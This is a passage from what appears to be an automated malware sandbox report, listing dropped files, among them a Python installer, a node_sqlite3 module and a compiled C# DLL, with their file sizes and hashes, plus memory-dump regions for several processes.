                                      df02b6bde94fba74dab7518f20d308cb7de4159de7cf882478e21e5be72fc04107e03b47fb3a19db1c357e56474a660f63833a78a2a5a1245018c4b313fe5780

                                    • C:\Users\Admin\AppData\Local\Temp\Python 3.12.6 (64-bit)_20241107212302_002_dev_JustForMe.log

                                      Filesize

                                      1KB

                                      MD5

                                      15497b0181b6448384e69635b5e3a04d

                                      SHA1

                                      5915c169e7e52748cc34e5caef07f542fa7baad4

                                      SHA256

                                      39ec7f6c0a41aba240b3935a67f9effb729d02467e87075e7ae601bdd1cf4bd6

                                      SHA512

                                      680e15b41d9293b2b5d4269eb5ce2ca70f3bfd1ff6015a28394051aae55a576d10f82a8ea626274c2c3d981016cfd88b000a07d280a2a18daf88e8f39783dcb7

                                    • C:\Users\Admin\AppData\Local\Temp\Python 3.12.6 (64-bit)_20241107212302_003_lib_JustForMe.log

                                      Filesize

                                      1KB

                                      MD5

                                      93018b1007518ae3a0396ce9e8dd5fa9

                                      SHA1

                                      21747254bae1d4587aa9003607371bd77493c5ab

                                      SHA256

                                      a03e5eab43e7ba473f341f705d55b40c12f2dd6fde313aaf0088c1ed38ca1ca3

                                      SHA512

                                      95c3dfd93fa508d65ebe182e758dbd7159857bfa552b1393985c62d2b19742bf2c6efc0fd020c23e8bb37809d8af32a78ea80f3051451476457acef873ce929f

                                    • C:\Users\Admin\AppData\Local\Temp\Python 3.12.6 (64-bit)_20241107212302_004_tcltk_JustForMe.log

                                      Filesize

                                      1KB

                                      MD5

                                      42c63ae22d2f006390f1b047ec798e9d

                                      SHA1

                                      281786dd9925c741ca16b3e532a0be5b33c9c0f8

                                      SHA256

                                      f811602a6426938cd2742b90b520af57f6ab01b035c0230ae0d0a8c7164e50e2

                                      SHA512

                                      e58c81b421182feedd0b67b066a2876f55eaccbf832af476c8105a65709ec37ba81e82758cd4f679c2f15507a9088cd2966e221f186e66c596492c4a51e948bb

                                    • C:\Users\Admin\AppData\Local\Temp\RESCAD2.tmp

                                      Filesize

                                      1KB

                                      MD5

                                      d6c42e0b103b36637e3d8f2ef0a373c9

                                      SHA1

                                      186987841801e56c38e93ea2c7c082105a922a10

                                      SHA256

                                      55316bc2be43178cc08ba0808384b1cc519f50a8a9856adec468b770bab536af

                                      SHA512

                                      034defc1ed92d69031e54fa53104f9c15adeed711d3a23a56bc2a4a54cc47c90973c6294c2ca8ccd0958efd764675e3b035525674b233d6674ca0a116c4b9ece

                                    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3cbolug0.qdt.ps1

                                      Filesize

                                      60B

                                      MD5

                                      d17fe0a3f47be24a6453e9ef58c94641

                                      SHA1

                                      6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                      SHA256

                                      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                      SHA512

                                      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                    • C:\Users\Admin\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\build\Release\node_sqlite3.node

                                      Filesize

                                      1.8MB

                                      MD5

                                      66a65322c9d362a23cf3d3f7735d5430

                                      SHA1

                                      ed59f3e4b0b16b759b866ef7293d26a1512b952e

                                      SHA256

                                      f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c

                                      SHA512

                                      0a44d12852fc4c74658a49f886c4bc7c715c48a7cb5a3dcf40c9f1d305ca991dd2c2cb3d0b5fd070b307a8f331938c5213188cbb2d27d47737cc1c4f34a1ea21

                                    • C:\Users\Admin\AppData\Local\Temp\python-installer.exe

                                      Filesize

                                      25.3MB

                                      MD5

                                      d8548aa7609a762ba66f62eeb2ca862d

                                      SHA1

                                      2eb85b73cab52693d3a27446b7de1c300cc05655

                                      SHA256

                                      5914748e6580e70bedeb7c537a0832b3071de9e09a2e4e7e3d28060616045e0a

                                      SHA512

                                      37fa7250b10b0c03b87d800bf4f920589649309cb4fbd25864475084bb7873d62b809a4fdeabd06c79f03f33614218eb7e01a9bd796de29dd3b141f1906d588c

                                    • C:\Users\Admin\AppData\Local\Temp\xc4b4an4\xc4b4an4.dll

                                      Filesize

                                      3KB

                                      MD5

                                      1fa17c43c129ecccdfcd9b6f8b93e458

                                      SHA1

                                      d973ebd425440ddfb5c687d4d6fbf22b83603d01

                                      SHA256

                                      1c2bbbe59029d620a49cb90038e4685af6ce92d330be6e866a809b80d06c40d9

                                      SHA512

                                      56e2f234b12f13977902bd06e7df150b4923f7f9e3a168f821ad8f300437588a64384976531d5beecedb5a59175c09cca1558ac0ed47fe65cea4d19ee4be1444

                                    • C:\Windows\Temp\{7119ADAA-B885-4190-B9E2-AAD3314F5C5B}\.cr\python-installer.exe

                                      Filesize

                                      858KB

                                      MD5

                                      931227a65a32cebf1c10a99655ad7bbd

                                      SHA1

                                      1b874fdef892a2af2501e1aaea3fcafb4b4b00c6

                                      SHA256

                                      1dcf770dc47264f7495a559f786a4428f3a97f9d81e4c466ec9a5636f5a1be6d

                                      SHA512

                                      0212b5adc6ee8893edf4b94272fdffe145f53fe31357a3e024543f434cdc022a915d76780c1103aa9948feca5f161cfae608f91f3c7a876569e91c05d690d507

                                    • C:\Windows\Temp\{E130E29F-F6A2-40B8-8673-DCB0C04A5EEC}\.ba\PythonBA.dll

                                      Filesize

                                      675KB

                                      MD5

                                      8c8e5a5ca0483abdc6ad6ef22c73b5d2

                                      SHA1

                                      9b7345ab1b60bb3fb37c9dc7f331155b4441e4dc

                                      SHA256

                                      edc6db3712eb4e1cd6988bc7b42c467ac6901148f3ee4bdfb286eff26efbfd43

                                      SHA512

                                      861ad726872b58e5b8b7c580b485e7bde0be6c1963ac23db63d4105684d1e50e8f409cd329f183d252a52e2be2737efaf9e4413eff29deee75b87850664b3157

                                    • C:\Windows\Temp\{E130E29F-F6A2-40B8-8673-DCB0C04A5EEC}\.ba\SideBar.png

                                      Filesize

                                      50KB

                                      MD5

                                      888eb713a0095756252058c9727e088a

                                      SHA1

                                      c14f69f2bef6bc3e2162b4dd78e9df702d94cdb4

                                      SHA256

                                      79434bd1368f47f08acf6db66638531d386bf15166d78d9bfea4da164c079067

                                      SHA512

                                      7c59f4ada242b19c2299b6789a65a1f34565fed78730c22c904db16a9872fe6a07035c6d46a64ee94501fbcd96de586a8a5303ca22f33da357d455c014820ca0

                                    • C:\Windows\Temp\{E130E29F-F6A2-40B8-8673-DCB0C04A5EEC}\pip_JustForMe

                                      Filesize

                                      268KB

                                      MD5

                                      494f112096b61cb01810df0e419fb93c

                                      SHA1

                                      295c32c8e1654810c4807e42ba2438c8da39756a

                                      SHA256

                                      2a1f085a0ad75d5b332fb0fe9e1a40146c311e8e524e898a09ca40157619fa80

                                      SHA512

                                      9c8ec8fcc5d74b5022cd170677b62dfedbc187fde1dd296bdb9733bec03e18674a385928c8827a4ce1864433d50e8598228a6d2198aef2937c0dcc0d8f4ea704

                                    • \??\c:\Users\Admin\AppData\Local\Temp\xc4b4an4\CSC494ABE77D2334C0D91624C649598BB13.TMP

                                      Filesize

                                      652B

                                      MD5

                                      e07d7ca60d9b3e8ace2f6a2ea5992484

                                      SHA1

                                      67ee8e4647f0892b0e8a99ebc9621678458830f3

                                      SHA256

                                      b97ab774252153bde72a4cee8c3784fa3ea606365a02cfb6548690900e7d336c

                                      SHA512

                                      a581933bcc653440f1c3c7b34061501c1cae82922169d6242ee946acfc4a2ed53ef7d714ab806ee765b94c6cf4be6ee4b11310c8b58ac9142e1c47e61762fc8b

                                    • \??\c:\Users\Admin\AppData\Local\Temp\xc4b4an4\xc4b4an4.0.cs

                                      Filesize

                                      312B

                                      MD5

                                      ecbf151f81ff98f7dff196304a40239e

                                      SHA1

                                      ccf6b97b6f8276656b042d64f0595963fe9ec79c

                                      SHA256

                                      295ca195631c485c876e7c468ddcbb3fe7cd219d3e5005a2441be2de54e62ac8

                                      SHA512

                                      4526a59055a18af6c0c13fb9f55a9a9bc15aa1407b697849e19b6cc32c88ee7206b3efff806bd154d36bce144ae1d9c407c6ea0f5077c54fbe92cd172c203720

                                    • \??\c:\Users\Admin\AppData\Local\Temp\xc4b4an4\xc4b4an4.cmdline

                                      Filesize

                                      369B

                                      MD5

                                      dc4bdb255f8840e568cd4b0b281dec6e

                                      SHA1

                                      6b1aadaac1b438251ef03f5463d553063967092e

                                      SHA256

                                      c73e8c7eb0470eec9e4d3a468f9ba9b5114097159e25d254d8535b007ed42445

                                      SHA512

                                      4c84870b8ae4e12e76a2c102d131459994ec9b337d0efea5aaa5ace30592eb93c526ee645ffded513828638c4d194a9a07a2d93f5fa6a1e906b8161eadb1a6ad

                                    • memory/2584-104-0x00000262B82F0000-0x00000262B8312000-memory.dmp

                                      Filesize

                                      136KB

                                    • memory/2584-122-0x00000262B82D0000-0x00000262B82D8000-memory.dmp

                                      Filesize

                                      32KB

                                    • memory/3036-0-0x00007FF83C323000-0x00007FF83C325000-memory.dmp

                                      Filesize

                                      8KB

                                    • memory/3036-1-0x0000000000D50000-0x0000000003346000-memory.dmp

                                      Filesize

                                      38.0MB

                                    • memory/3516-359-0x00000209CD720000-0x00000209CD721000-memory.dmp

                                      Filesize

                                      4KB

                                    • memory/3516-357-0x00000209CD720000-0x00000209CD721000-memory.dmp

                                      Filesize

                                      4KB

                                    • memory/3516-355-0x00000209CD720000-0x00000209CD721000-memory.dmp

                                      Filesize

                                      4KB

                                    • memory/3516-354-0x00000209CD720000-0x00000209CD721000-memory.dmp

                                      Filesize

                                      4KB

                                    • memory/3516-360-0x00000209CD720000-0x00000209CD721000-memory.dmp

                                      Filesize

                                      4KB

                                    • memory/3516-350-0x00000209CD720000-0x00000209CD721000-memory.dmp

                                      Filesize

                                      4KB

                                    • memory/3516-349-0x00000209CD720000-0x00000209CD721000-memory.dmp

                                      Filesize

                                      4KB

                                    • memory/3516-356-0x00000209CD720000-0x00000209CD721000-memory.dmp

                                      Filesize

                                      4KB

                                    • memory/3516-358-0x00000209CD720000-0x00000209CD721000-memory.dmp

                                      Filesize

                                      4KB

                                    • memory/3516-348-0x00000209CD720000-0x00000209CD721000-memory.dmp

                                      Filesize

                                      4KB

                                    • memory/4528-138-0x0000011A7E840000-0x0000011A7E890000-memory.dmp

                                      Filesize

                                      320KB

                                    • memory/4952-232-0x00000000745F2000-0x00000000745F3000-memory.dmp

                                      Filesize

                                      4KB

                                    • memory/4952-22-0x00000000745F0000-0x0000000074BA1000-memory.dmp

                                      Filesize

                                      5.7MB

                                    • memory/4952-21-0x00000000745F2000-0x00000000745F3000-memory.dmp

                                      Filesize

                                      4KB

                                    • memory/4952-295-0x00000000745F0000-0x0000000074BA1000-memory.dmp

                                      Filesize

                                      5.7MB